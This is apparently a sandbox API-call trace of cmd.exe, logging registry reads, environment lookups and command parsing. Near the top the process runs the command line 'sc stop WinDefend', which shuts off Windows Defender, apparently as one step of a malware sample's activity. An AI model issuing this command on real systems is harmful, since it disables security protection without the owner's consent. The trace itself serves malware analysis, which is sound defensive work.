	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x1, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0x1, lpcbData=0x29ebdc*=0x1000) returned 0x2
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x0, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x9, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x4, lpData=0x29ebe4*=0x9, lpcbData=0x29ebdc*=0x4) returned 0x0
	[0045.348] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x29ebe0, lpData=0x29ebe4, lpcbData=0x29ebdc*=0x1000 | out: lpType=0x29ebe0*=0x0, lpData=0x29ebe4*=0x9, lpcbData=0x29ebdc*=0x1000) returned 0x2
	[0045.348] RegCloseKey (hKey=0x40) returned 0x0
	[0045.348] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf31
	[0045.348] srand (_Seed=0x5cdadf31) 
	[0045.349] GetCommandLineW () returned="/c sc stop WinDefend"
	[0045.349] GetCommandLineW () returned="/c sc stop WinDefend"
	[0045.349] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d85260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.349] GetProcessHeap () returned 0x460000
	[0045.349] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x470238
	[0045.349] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x470240, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0045.349] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0045.349] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0045.349] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0045.349] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0045.349] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0045.350] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0045.350] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0045.350] GetProcessHeap () returned 0x460000
	[0045.350] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x470b78 | out: hHeap=0x460000) returned 1
	[0045.350] GetEnvironmentStringsW () returned 0x470450*
	[0045.350] GetProcessHeap () returned 0x460000
	[0045.350] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x94a) returned 0x472750
	[0045.351] FreeEnvironmentStringsW (penv=0x470450) returned 1
	[0045.351] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0045.351] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0045.351] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0045.351] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0045.351] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0045.351] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0045.351] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0045.351] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0045.351] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0045.351] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0045.351] GetProcessHeap () returned 0x460000
	[0045.351] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x30) returned 0x4700b8
	[0045.351] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x29f9a4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x29f9a4, lpFilePart=0x29f9a0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x29f9a0*="system32") returned 0x13
	[0045.351] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0045.351] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x29f720 | out: lpFindFileData=0x29f720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x4607f0
	[0045.352] FindClose (in: hFindFile=0x4607f0 | out: hFindFile=0x4607f0) returned 1
	[0045.352] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x29f720 | out: lpFindFileData=0x29f720*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4607f0
	[0045.352] FindClose (in: hFindFile=0x4607f0 | out: hFindFile=0x4607f0) returned 1
	[0045.352] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0045.352] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0045.352] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0045.352] GetProcessHeap () returned 0x460000
	[0045.352] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x472750 | out: hHeap=0x460000) returned 1
	[0045.352] GetEnvironmentStringsW () returned 0x470450*
	[0045.352] GetProcessHeap () returned 0x460000
	[0045.352] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x97a) returned 0x471df8
	[0045.352] FreeEnvironmentStringsW (penv=0x470450) returned 1
	[0045.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49d85260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0045.352] GetProcessHeap () returned 0x460000
	[0045.352] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x4700b8 | out: hHeap=0x460000) returned 1
	[0045.352] GetProcessHeap () returned 0x460000
	[0045.352] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400e) returned 0x473a30
	[0045.353] GetProcessHeap () returned 0x460000
	[0045.353] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x30) returned 0x4700b8
	[0045.353] GetProcessHeap () returned 0x460000
	[0045.353] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x473a30 | out: hHeap=0x460000) returned 1
	[0045.353] GetConsoleOutputCP () returned 0x1b5
	[0045.353] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49d84260 | out: lpCPInfo=0x49d84260) returned 1
	[0045.353] GetUserDefaultLCID () returned 0x409
	[0045.353] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49d84950, cchData=8 | out: lpLCData=":") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x29fae4, cchData=128 | out: lpLCData="0") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x29fae4, cchData=128 | out: lpLCData="0") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x29fae4, cchData=128 | out: lpLCData="1") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49d84940, cchData=8 | out: lpLCData="/") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49d84d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49d84d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49d84d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49d84cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49d84c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49d84c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49d84c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49d84930, cchData=8 | out: lpLCData=".") returned 2
	[0045.354] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49d84920, cchData=8 | out: lpLCData=",") returned 2
	[0045.354] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0045.356] GetProcessHeap () returned 0x460000
	[0045.356] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x20c) returned 0x4727b8
	[0045.356] GetConsoleTitleW (in: lpConsoleTitle=0x4727b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0045.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0045.356] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0045.356] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0045.356] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0045.356] GetProcessHeap () returned 0x460000
	[0045.356] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x400a) returned 0x473a30
	[0045.357] GetProcessHeap () returned 0x460000
	[0045.357] HeapFree (in: hHeap=0x460000, dwFlags=0x0, lpMem=0x473a30 | out: hHeap=0x460000) returned 1
	[0045.357] _wcsicmp (_String1="sc", _String2=")") returned 74
	[0045.357] _wcsicmp (_String1="FOR", _String2="sc") returned -13
	[0045.357] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13
	[0045.357] _wcsicmp (_String1="IF", _String2="sc") returned -10
	[0045.357] _wcsicmp (_String1="IF/?", _String2="sc") returned -10
	[0045.357] _wcsicmp (_String1="REM", _String2="sc") returned -1
	[0045.357] _wcsicmp (_String1="REM/?", _String2="sc") returned -1
	[0045.357] GetProcessHeap () returned 0x460000
	[0045.357] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x58) returned 0x4729d0
	[0045.357] GetProcessHeap () returned 0x460000
	[0045.357] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe) returned 0x46d580
	[0045.357] GetProcessHeap () returned 0x460000
	[0045.357] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x28) returned 0x472a30
	[0045.358] GetConsoleTitleW (in: lpConsoleTitle=0x29f7dc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0045.358] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0045.358] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0045.358] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0045.358] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0045.358] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0045.358] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0045.358] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0045.358] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0045.359] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0045.359] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0045.359] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0045.359] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0045.359] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0045.359] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0045.359] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0045.359] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0045.359] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0045.359] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0045.359] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0045.359] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0045.359] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0045.359] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0045.359] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0045.359] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0045.359] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0045.359] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0045.359] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0045.359] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0045.359] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0045.359] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0045.359] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0045.359] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0045.359] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0045.359] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0045.359] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0045.359] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0045.359] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0045.359] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0045.359] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0045.360] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0045.360] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0045.360] _wcsicmp (_String1="sc", _String2="DIR") returned 15
	[0045.360] _wcsicmp (_String1="sc", _String2="ERASE") returned 14
	[0045.360] _wcsicmp (_String1="sc", _String2="DEL") returned 15
	[0045.360] _wcsicmp (_String1="sc", _String2="TYPE") returned -1
	[0045.360] _wcsicmp (_String1="sc", _String2="COPY") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="CD") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="RENAME") returned 1
	[0045.360] _wcsicmp (_String1="sc", _String2="REN") returned 1
	[0045.360] _wcsicmp (_String1="sc", _String2="ECHO") returned 14
	[0045.360] _wcsicmp (_String1="sc", _String2="SET") returned -2
	[0045.360] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3
	[0045.360] _wcsicmp (_String1="sc", _String2="DATE") returned 15
	[0045.360] _wcsicmp (_String1="sc", _String2="TIME") returned -1
	[0045.360] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3
	[0045.360] _wcsicmp (_String1="sc", _String2="MD") returned 6
	[0045.360] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6
	[0045.360] _wcsicmp (_String1="sc", _String2="RD") returned 1
	[0045.360] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1
	[0045.360] _wcsicmp (_String1="sc", _String2="PATH") returned 3
	[0045.360] _wcsicmp (_String1="sc", _String2="GOTO") returned 12
	[0045.360] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5
	[0045.360] _wcsicmp (_String1="sc", _String2="CLS") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="CALL") returned 16
	[0045.360] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3
	[0045.360] _wcsicmp (_String1="sc", _String2="VER") returned -3
	[0045.360] _wcsicmp (_String1="sc", _String2="VOL") returned -3
	[0045.360] _wcsicmp (_String1="sc", _String2="EXIT") returned 14
	[0045.360] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2
	[0045.360] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14
	[0045.360] _wcsicmp (_String1="sc", _String2="TITLE") returned -1
	[0045.360] _wcsicmp (_String1="sc", _String2="START") returned -17
	[0045.360] _wcsicmp (_String1="sc", _String2="DPATH") returned 15
	[0045.361] _wcsicmp (_String1="sc", _String2="KEYS") returned 8
	[0045.361] _wcsicmp (_String1="sc", _String2="MOVE") returned 6
	[0045.361] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3
	[0045.361] _wcsicmp (_String1="sc", _String2="POPD") returned 3
	[0045.361] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18
	[0045.361] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13
	[0045.361] _wcsicmp (_String1="sc", _String2="BREAK") returned 17
	[0045.361] _wcsicmp (_String1="sc", _String2="COLOR") returned 16
	[0045.361] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6
	[0045.361] _wcsicmp (_String1="sc", _String2="FOR") returned 13
	[0045.361] _wcsicmp (_String1="sc", _String2="IF") returned 10
	[0045.361] _wcsicmp (_String1="sc", _String2="REM") returned 1
	[0045.361] GetProcessHeap () returned 0x460000
	[0045.361] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x210) returned 0x472a60
	[0045.361] GetProcessHeap () returned 0x460000
	[0045.361] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x2e) returned 0x472c78
	[0045.361] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16
	[0045.361] GetProcessHeap () returned 0x460000
	[0045.361] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x418) returned 0x4607f0
	[0045.361] SetErrorMode (uMode=0x0) returned 0x0
	[0045.361] SetErrorMode (uMode=0x1) returned 0x0
	[0045.361] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4607f8, lpFilePart=0x29f2fc | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x29f2fc*="system32") returned 0x13
	[0045.361] SetErrorMode (uMode=0x0) returned 0x1
	[0045.361] GetProcessHeap () returned 0x460000
	[0045.361] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x4607f0, Size=0x36) returned 0x4607f0
	[0045.362] GetProcessHeap () returned 0x460000
	[0045.362] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x4607f0) returned 0x36
	[0045.362] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0045.362] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0045.362] GetProcessHeap () returned 0x460000
	[0045.362] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x144) returned 0x472cb0
	[0045.362] GetProcessHeap () returned 0x460000
	[0045.362] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x280) returned 0x472e00
	[0045.369] GetProcessHeap () returned 0x460000
	[0045.369] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472e00, Size=0x146) returned 0x472e00
	[0045.369] GetProcessHeap () returned 0x460000
	[0045.369] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472e00) returned 0x146
	[0045.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49d90640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0045.369] GetProcessHeap () returned 0x460000
	[0045.369] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0xe0) returned 0x472f50
	[0045.369] GetProcessHeap () returned 0x460000
	[0045.369] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x472f50, Size=0x76) returned 0x472f50
	[0045.369] GetProcessHeap () returned 0x460000
	[0045.369] RtlSizeHeap (HeapHandle=0x460000, Flags=0x0, MemoryPointer=0x472f50) returned 0x76
	[0045.370] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0045.370] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.*", fInfoLevelId=0x1, lpFindFileData=0x29f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x29f078) returned 0x472fd0
	[0045.371] GetProcessHeap () returned 0x460000
	[0045.371] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x0, Size=0x14) returned 0x473010
	[0045.371] FindClose (in: hFindFile=0x472fd0 | out: hFindFile=0x472fd0) returned 1
	[0045.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.COM", fInfoLevelId=0x1, lpFindFileData=0x29f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x29f078) returned 0xffffffff
	[0045.371] GetLastError () returned 0x2
	[0045.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\sc.EXE", fInfoLevelId=0x1, lpFindFileData=0x29f078, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x29f078) returned 0x472fd0
	[0045.371] GetProcessHeap () returned 0x460000
	[0045.371] RtlReAllocateHeap (Heap=0x460000, Flags=0x0, Ptr=0x473010, Size=0x4) returned 0x473010
	[0045.371] FindClose (in: hFindFile=0x472fd0 | out: hFindFile=0x472fd0) returned 1
	[0045.371] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0045.371] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0045.371] GetConsoleTitleW (in: lpConsoleTitle=0x29f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0045.372] InitializeProcThreadAttributeList (in: lpAttributeList=0x29f3f8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x29f4c0 | out: lpAttributeList=0x29f3f8, lpSize=0x29f4c0) returned 1
	[0045.372] UpdateProcThreadAttribute (in: lpAttributeList=0x29f3f8, dwFlags=0x0, Attribute=0x60001, lpValue=0x29f4b8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x29f3f8, lpPreviousValue=0x0) returned 1
	[0045.372] GetStartupInfoW (in: lpStartupInfo=0x29f3b4 | out: lpStartupInfo=0x29f3b4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) 
	[0045.372] GetProcessHeap () returned 0x460000
	[0045.372] RtlAllocateHeap (HeapHandle=0x460000, Flags=0x8, Size=0x18) returned 0x472fd0
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0045.372] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0045.373] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
